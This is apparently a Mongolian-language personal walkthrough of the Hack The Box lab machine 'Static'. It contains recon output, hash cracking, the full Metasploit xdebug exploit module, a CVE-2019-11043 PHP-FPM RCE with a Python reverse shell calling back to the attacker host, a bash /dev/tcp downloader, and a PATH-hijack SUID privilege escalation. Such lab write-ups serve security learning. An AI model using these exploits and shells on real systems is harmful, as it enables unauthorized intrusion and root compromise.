PS: Үүсгэсэн огноо: 2021 оны 11-р сарын 6~9 өдрүүдэд бичсэн тэмдэглэл юм.
1. IP Address
# Machine Address
10.10.10.246
# Local Address
10.10.14.22
2. Nmap
sudo nmap -sC -sV -oA nmap/static 10.10.10.246
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 00:31 EDT
Nmap scan report for 10.10.10.246
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
| 256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_ 256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_ 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3. Gobuster
gobuster dir -u http://10.10.10.246:8080/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x .php,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.246:8080/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2021/11/06 00:36:53 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 55]
Progress: 117513 / 661683 (17.76%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/11/06 00:44:47 Finished
===============================================================
Robot.txt
User-agent: *
Disallow: /vpn/
Disallow: /.ftp_uploads/
4. fixgz
Git -с clone:
git clone https://github.com/yonjar/fixgz.git
cpp compile:
g++ fixgz.cpp -o fixgz
broken gz засах:
./fixgz db.sql.gz db.gz
Unzip:
gunzip db.gz
cat db
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) );
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
5. Hash
hash:
d033e22ae348aeb5660fc2140aec35850c4da997
Файл болгов:
vi hash
d033e22ae348aeb5660fc2140aec35850c4da997
Hash тайлах:
john hash
Output:
Created directory: /home/ca4mi/.john
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
admin (?)
1g 0:00:00:00 DONE 2/3 (2021-11-06 01:01) 20.00g/s 56480p/s 56480c/s 56480C/s abbott..admin1
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
admin
6. 2FA
Machine, HTB-н VPN нарын цагийн бүс адилхан байх хэрэгтэй юм билээ. HTB дээрх сервер zone сольж ороод дахин үзсэн.
/vpn/login.php: 2FA нэхэж байгаа https://addons.mozilla.org/en-US/firefox/addon/auth-helper/ - татаж аваад entry оруулаад орсон.
http://10.10.10.246:8080/vpn/panel.php
7. OVPN
Support хэсгээс web - vpn татаж аваад ажилууллна.
openvpn web.ovpn
Оutput:
2021-11-06 04:25:07 Outgoing Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:07 Incoming Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:07 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
2021-11-06 04:25:07 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
2021-11-06 04:25:07 Could not determine IPv4/IPv6 protocol
2021-11-06 04:25:07 SIGUSR1[soft,init_instance] received, process restarting
2021-11-06 04:25:07 Restart pause, 40 second(s)
2021-11-06 04:25:47 Outgoing Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:47 Incoming Control Channel Authentication: Using 160 bit message hash 'SHA1' for HMAC authentication
2021-11-06 04:25:47 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
2021-11-06 04:25:47 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
vpn.static.htb - танихгүй байгаа. etc/hosts дотор нэмэх.
172.20.0.10 - browser-с хандалт авахгүй байна.
ifconfig:
tun9: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 172.30.0.9 netmask 255.255.0.0 destination 172.30.0.9
inet6 fe80::9198:489e:ac83:105 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 192 (192.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun9 -г route руу access хийнэ. Ингэснээр 172.30.0.9 -> 172.20.0.0/24:
ip route add 172.20.0.0/24 dev tun9
/Host/ Parrot OS - ip route add хийхэд sudo шаардсан. sudo-г нэмсэн.
7. Metasploit - xdebug
info.php ороод xdebug байгаа.
Version: 2.6.0
metasploit: https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/ metasploit run:
sudo msfdb run
Тохируулга хийх:
use exploit/unix/http/xdebug_unauth_exec
set PATH /vpn/login.php
set RHOSTS 172.20.0.10
set LHOST tun9
set LPORT 9001
Тохиргоо:
Module options (exploit/unix/http/xdebug_unauth_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PATH /vpn/login.php yes Path to target webapp
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.20.0.10 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes Callback host for accepting connections
SRVPORT 9000 yes Port to listen for the debugger
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST tun9 yes The listen address (an interface may be specified)
LPORT 9001 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Ажилууллах
run
1500 -> 1200 болгож үзсэн, exploit болохгүй байсан болохоор connection-д асуудал байна уу. Гэхдээ болоогүй.
ifconfig tun0 mtu 1200
metaexploit -с нь биш шууд ruby ажилууллах гэж үзсэн. Болоогүй.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
'DisclosureDate' => '2017-09-17',
'Author' => [
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
'Shaksham Jaiswal', # MinatoTW
'Mumbai' # Austin Hudson
],
'References' => [
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
['URL', 'https://paper.seebug.org/397/']
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => [ARCH_PHP],
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
register_options([
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
Opt::RPORT(80),
])
end
def check
begin
res = send_request_cgi({
'uri' => datastore["PATH"],
'method' => 'GET',
'vars_get' => {
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
}
})
vprint_status "Request sent\n#{res}"
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good("Looks like remote server has xdebug enabled\n")
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end
def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['SRVPORT'],
'LocalHost' => datastore['SRVHOST'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
})
client = server.accept
print_status("Waiting for client response.")
data = client.recv(1024)
print_status("Receiving response")
vprint_line(data)
print_status("Shell might take upto a minute to respond.Please be patient.")
print_status("Sending payload of size #{cmd1.length} bytes")
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => "#{lhost}",
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
}
})
end
end
Exploit болохгүй байсан. Тэгээд цаг нилээн аваад байхаар нь бэлэн rsa -г writeup, forum үзэж байгаад шууд хуулсан.
-----BEGIN RSA PRIVATE KEY-----
MII***********
-----END RSA PRIVATE KEY-----
www-data - нэрээр нэвтэрч ороод user.txt авсан. -p 2222 бичихгүй бол болохгүй nmap дээр ssh порт 2222 гэж заасан байсан.
ssh -i id_rsa_www-data www-data@10.10.10.246 -p 2222
8. Privilege escalation
ssh дотроос ifconfig:
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.20.0.10 netmask 255.255.255.0 broadcast 172.20.0.255
ether 02:42:ac:14:00:0a txqueuelen 0 (Ethernet)
RX packets 376 bytes 47797 (47.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 275 bytes 72946 (72.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.254.2 netmask 255.255.255.0 broadcast 192.168.254.255
ether 02:42:c0:a8:fe:02 txqueuelen 0 (Ethernet)
RX packets 48 bytes 29063 (29.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 25 bytes 1796 (1.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 28 bytes 1485 (1.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 1485 (1.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
192.168.254.2 -> 192.168.254.3 - ip хаяг
Port forwarding (sudo):
ssh -L 80:192.168.254.3:80 www-data@10.10.10.246 -p 2222 -i id_rsa_www-data
Out:
The authenticity of host '[10.10.10.246]:2222 ([10.10.10.246]:2222)' can't be established.
ECDSA key fingerprint is SHA256:SO5uMKk4fPWk/kDc0dLD5Uf7dlyIes4r6s26waZlxkQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.246]:2222' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.19.0-17-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Mon Nov 8 10:57:19 2021 from 10.10.14.84
localhost эсхүл 127.0.0.1 хандахаар:
batch mode: /usr/bin/ersatool create|print|revoke CN
Browser -> Network цэсээр ороод харвал:
X-Powered-By
PHP-FPM/7.1
- https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc
- https://github.com/theMiddleBlue/CVE-2019-11043
Git git clone https://github.com/theMiddleBlue/CVE-2019-11043.git dedsec.py: exploit.py ажилуулсны дараа бэлэн py ажилууллах rev shell. Бэлэн код аваад хуулсан.
import requests
payload = '/usr/bin/python3.6 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
r = requests.get("http://192.168.254.3/index.php?a="+payload)
print(r.text)
Netcat: https://github.com/H74N/netcat-binaries/blob/master/nc
Дээр байгаа 3 файл хэрэгтэй. Нэгтгэж аваад нэг dir дотор оруулсан.
total 780
drwxr-xr-x 1 ca4mi ca4mi 72 Nov 8 06:11 .
drwxr-xr-x 1 ca4mi ca4mi 26 Nov 8 06:07 ..
-rw-r--r-- 1 ca4mi ca4mi 349 Nov 8 06:05 dedsec.py
-rw-r--r-- 1 ca4mi ca4mi 4280 Nov 8 06:02 exploit.py
-rw------- 1 ca4mi ca4mi 1675 Nov 8 06:11 id_rsa_www-data
-rw-r--r-- 1 ca4mi ca4mi 779832 Nov 8 06:06 n
scp:
Тэгээд scp-р файлуудаа хуулсан.
scp -P 2222 -i id_rsa_www-data nc www-data@10.10.10.246:/tmp/nc
scp -P 2222 -i id_rsa_www-data exploit.py www-data@10.10.10.246:/tmp/exploit.py
scp -P 2222 -i id_rsa_www-data dedsec.py www-data@10.10.10.246:/tmp/dedsec.py
nc run:
bin шинээр ажилууллж байгаа тул chmod +x хийнэ.
www-data@web:/tmp$ chmod +x nc
www-data@web:/tmp$ ./nc -lvnp 9001
listening on [any] 9001 ...
exploit.py ажилуулбал:
python3 exploit.py --url [http://192.168.254.3/index.php](http://192.168.254.3/index.php)
Хэвийн байлаа:
www-data@web:/tmp$ python3 exploit.py --url http://192.168.254.3/index.php
[*] QSL candidate: 1754, 1759, 1764
[*] Target seems vulnerable (QSL:1754/HVL:220): PHPSESSID=a4632a83f8ca8a3690e01fc3cf1e1e19; path=/
[*] RCE successfully exploited!
You should be able to run commands using:
curl http://192.168.254.3/index.php?a=bin/ls+/
Бэлэн кодоо ажилууллах.
python3 dedsec.py
Энэ өөр таб дээр порт сонсож байгаад pki орж байгаа log:
listening on [any] 9001 ...
connect to [192.168.254.2] from (UNKNOWN) [192.168.254.3] 41604
www-data@pki:~/html$ ls
ls
index.php uploads
www-data@pki:~/html$
Ersatool - access шалгах:
ls -al /usr/bin/ersatool
-rwxr-xr-x 1 root root 22496 Jun 21 17:05 /usr/bin/ersatoo
ersatool - г ажилуулж болох эсэх:
find / -name ersatool.* 2>/dev/null
/usr/src/ersatool.c
http сервер асаах:
python3 -m http.server 1337
PSPY ажилууллах, wget, curl байхгүй болохоор өөр арга:
Bash script -г www-data@pki-с бичнэ:
1
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80exec **3**<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >**&3**
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <**&3**
exec **3**>&-
}
2
__curl http://192.168.254.2:1337/pspy > pspy
хуулах:
scp -P 2222 -i id_rsa_www-data pspy64s www-data@10.10.10.246:/tmp/pspy
pspy ажилуулах:
www-data@pki:/tmp/www$ chmod +x pspy
www-data@pki:/tmp/www$ ./pspy | tee log
pspy ажилуулаад ersatool (create, a,b print, exit..) юу хийж байгааг харсан. Хоёр REV SHELL хэрэгтэй болсон:
www-data@pki:/tmp/www$ chmod +x pspy
www-data@pki:/tmp/www$ ./pspy
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/06/25 02:46:00 CMD: UID=0 PID=9 | nginx: master process nginx
2021/06/25 02:46:00 CMD: UID=0 PID=7 | /bin/bash /entry.sh
2021/06/25 02:46:00 CMD: UID=33 PID=542 | php-fpm: pool www
2021/06/25 02:46:00 CMD: UID=33 PID=541 | php-fpm: pool www
2021/06/25 02:46:00 CMD: UID=33 PID=540 | php-fpm: pool www
2021/06/25 02:46:00 CMD: UID=33 PID=539 | php-fpm: pool www
2021/06/25 02:46:00 CMD: UID=33 PID=538 | php-fpm: pool www
2021/06/25 02:46:00 CMD: UID=33 PID=1950 | ./pspy
2021/06/25 02:46:00 CMD: UID=33 PID=1935 | /bin/bash
2021/06/25 02:46:00 CMD: UID=33 PID=1934 | python3 -c import pty; pty.spawn("/bin/bash")
2021/06/25 02:46:00 CMD: UID=33 PID=1931 | /bin/bash
2021/06/25 02:46:00 CMD: UID=33 PID=1930 | python3 -c import pty; pty.spawn("/bin/bash")
2021/06/25 02:46:00 CMD: UID=33 PID=1927 | /bin/bash
2021/06/25 02:46:00 CMD: UID=33 PID=1926 | //usr/bin/python3.6 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
2021/06/25 02:46:00 CMD: UID=33 PID=1925 | sh -c //usr/bin/python3.6 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
2021/06/25 02:46:00 CMD: UID=33 PID=1921 | /bin/bash
2021/06/25 02:46:00 CMD: UID=33 PID=1920 | //usr/bin/python3.6 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
2021/06/25 02:46:00 CMD: UID=33 PID=1919 | sh -c //usr/bin/python3.6 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
2021/06/25 02:46:00 CMD: UID=0 PID=12 | php-fpm: master process (/usr/local/etc/php-fpm.conf)
2021/06/25 02:46:00 CMD: UID=33 PID=11 | nginx: worker process
2021/06/25 02:46:00 CMD: UID=33 PID=10 | nginx: worker process
2021/06/25 02:46:00 CMD: UID=0 PID=1 | /bin/sh -c /entry.sh
2021/06/25 02:46:03 CMD: UID=33 PID=1959 | /usr/bin/ersatool
2021/06/25 02:46:35 CMD: UID=0 PID=1961 | sh -c /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1960 | /usr/bin/ersatool
2021/06/25 02:46:35 CMD: UID=0 PID=1962 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1963 | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`ChangeMe`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf
2021/06/25 02:46:35 CMD: UID=0 PID=1964 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1965 | openssl version
2021/06/25 02:46:35 CMD: UID=0 PID=1966 | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`a`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf
2021/06/25 02:46:35 CMD: UID=0 PID=1967 | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`a`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf
2021/06/25 02:46:35 CMD: UID=0 PID=1968 | mktemp /opt/easyrsa/pki/private/a.key.XXXXXXXXXX
2021/06/25 02:46:35 CMD: UID=0 PID=1969 | mktemp /opt/easyrsa/pki/reqs/a.req.XXXXXXXXXX
2021/06/25 02:46:35 CMD: UID=0 PID=1970 | openssl req -utf8 -new -newkey rsa:2048 -config /opt/easyrsa/pki/safessl-easyrsa.cnf -keyout /opt/easyrsa/pki/private/a.key.HZbmrNjLDK -out /opt/easyrsa/pki/reqs/a.req.BOyXzgidnO -nodes -batch
2021/06/25 02:46:35 CMD: UID=0 PID=1971 |
2021/06/25 02:46:35 CMD: UID=0 PID=1972 | mv /opt/easyrsa/pki/reqs/a.req.BOyXzgidnO /opt/easyrsa/pki/reqs/a.req
2021/06/25 02:46:35 CMD: UID=0 PID=1973 | openssl rand -hex -out /opt/easyrsa/pki/serial 16
2021/06/25 02:46:35 CMD: UID=0 PID=1974 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1975 | openssl ca -config /opt/easyrsa/pki/openssl-easyrsa.cnf -status 2243a379dfbe067da1fa206727f760b3
2021/06/25 02:46:35 CMD: UID=0 PID=1976 | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`a`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf
2021/06/25 02:46:35 CMD: UID=0 PID=1977 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1979 | openssl req -in /opt/easyrsa/pki/reqs/a.req -noout -subject -nameopt multiline
2021/06/25 02:46:35 CMD: UID=0 PID=1978 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1980 | cat /opt/easyrsa/x509-types/COMMON
2021/06/25 02:46:35 CMD: UID=0 PID=1983 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1984 | awk
BEGIN {IGNORECASE=1; r=2}
{ if(match($0,"no")) {r=1; exit}
if(match($0,"yes")) {r=0; exit}
} END {exit r}
2021/06/25 02:46:35 CMD: UID=0 PID=1985 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1987 | openssl ca -utf8 -in /opt/easyrsa/pki/reqs/a.req -out /opt/easyrsa/pki/issued/a.crt.hgNfbGlQKY -config /opt/easyrsa/pki/safessl-easyrsa.cnf -extfile /opt/easyrsa/pki/extensions.temp -days 36500 -batch
2021/06/25 02:46:35 CMD: UID=0 PID=1988 | mv /opt/easyrsa/pki/issued/a.crt.hgNfbGlQKY /opt/easyrsa/pki/issued/a.crt
Openssl -г compile хийх болгондоо root access ашиглаад байсан юм шиг байгаа. Тэгээд openssl -г root рүү ороход trigger болгож ашиглахад зориулж /bin/bash бэлдэж өгөөд -p -г ашиглаад /root - dir рүү хандаж болгох.
openssl нэртэй файл үүсгээд дотор нь:
**#!/bin/bash**
chmod u+s /bin/bash
base64 рүү:
┌─[ca4mi@ca4mi-virtualbox]─[~/Documents/htb/machine/static/www/cheat]
└──╼ $cat openssl | base64
IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=
pki дотор decode хийнэ
echo "IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=" | base64 -d > openssl
cat openssl
#!/bin/bash
chmod u+s /bin/bash
Permission нэмэх:
chmod 755 openssl
Path үүсгээд дотор openssl хийгээд доор байгааг ажилуулна:
export PATH=/tmp/pwn:$PATH
echo $PATH
/tmp/pwn:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Ersatool ажилууллахаар usr/bin/spin давхар ажиллаж байгааг ашиглах. Тэгээд create, delete, a, b, c гээд үүсгэж байгаад доор /bin/bash -н permission suid болж байгааг ажилгана.
www-data@pki:/tmp/pwn$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash
www-data@pki:/tmp/pwn$ /bin/bash -p
bash-4.4# cd /root/
bash-4.4# ls
notes.txt root.txt